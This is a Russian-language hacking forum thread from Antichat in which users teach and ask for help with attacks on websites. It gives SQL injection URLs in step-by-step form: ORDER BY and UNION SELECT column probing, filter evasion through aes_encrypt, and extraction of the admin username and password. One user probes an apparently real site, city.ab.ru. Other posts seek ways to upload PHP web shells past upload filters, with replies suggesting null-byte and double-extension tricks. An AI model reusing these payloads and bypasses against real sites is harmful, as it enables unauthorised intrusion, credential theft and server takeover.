ANTICHAT — форум по информационной безопасности, OSINT и технологиям

4y4o дальше нужно подобрать количество полей
например

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,6/*

можно задать больше 6 . и если на странице отобразится скажем цифра 4 то значит отобразилось значение 4 поля(самый простой метод)

можно так же подобрать количество полей (лично я так подбираю) с помощью оператора order by

например

ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+3/*
если ошибки нет то полей больше трёх или три
берём например больше
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+10/*
если ошибка есть то полей меньше 10
и так короче находи цифру с которой ошибки небудет но следущая цифра должна отображать ошибку
скажем нашли количество полей например оно равно 6
дальше проверяеш стоит ли фильтрация на какиенибуть символы задаём команду скажем узнать версию майскула
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,version(),7,8/*
если отобразилась версия то фильтрации нет если нет то попробуй закодировать эту команду скажем так
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,aes_decrypt(aes_encrypt(con cat(version()),1),1),7,8/*
отобразилась версия. дальше нужно узнать в какой таблице лежат данные юзерей (можно с помощью брутфорса, надо бы написать мне такой а хотя уже есть наверно)
узнали например имя этой таблицы polzovateli
и выводим логин и пароль первого пользователя(он в большинстве случаев админ)

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,5,concat(username,0x3a,password)+from+ polzovateli+limit+1,1/*

бред, если считать что у него скуль в авторизации. где оно по твоему выводить будет?
только посимвольный перебор

__________________

дядя blackybr шарит . папсов видно издалека. Это ж не простая скуля. асю дашь?

У меня имеется сайт-файлообменник, при реге у тебя создаются на сайте папка site.com/upload/user/ в которую можно заливать все что угодно, например ссылка на залитый файл будет выглядеть site.com/upload/user/file.x. Я пытался залить файл shell.php, но при попытке пройти по ссылке upload/user/shell.php сервер предлагает его скачать как shell_php.htm т.е. он его переименовывает хотя ссылка на файл остается upload/user/shell.php и содеожимое файла "500 Internal Server Error", а если имя неверно, то выкидывает ошибку 404. Файловый архив самописный. Вопрос: Можно ли как-нибудь залить шелл?

Вот запрос, судя по всему 3 таблицы :
http://city.ab.ru/index.php?pg=show&kat=-1+order+by+3/*
дальше
http://city.ab.ru/index.php?pg=show&kat=-1+union+select+1,2,3/*

You have an error in your SQL syntax near 'union select 1,2,3/*' at line 1

Копаем дальше... непонятно пока ничего

хех, версия мускла вроде как 3тья!!!!

что можно еще накопать ?

Файлы можешь читать, так что скрипт пиши, ищи полезные файлы и читай

больше ничего полезного имхо, т.к. кавычки экранируются

__________________
Карфаген должен быть разрушен...

залил шелл на сайт через форму для загрузки изображений, но чтобы его залить пришлось расширение поменять на gif, а как php то теперь сделать? ((((
при переходе на изображение просто пустое окно огромного размера

попробуй в конце урл добавить %00
или залей как .php.gif

эхх нитак и нитак не получилось (((
после заливки там меняется название файла и поулчается то же самое blablabal.gif,
%00 тоже не помогло ( Всеравно спасибо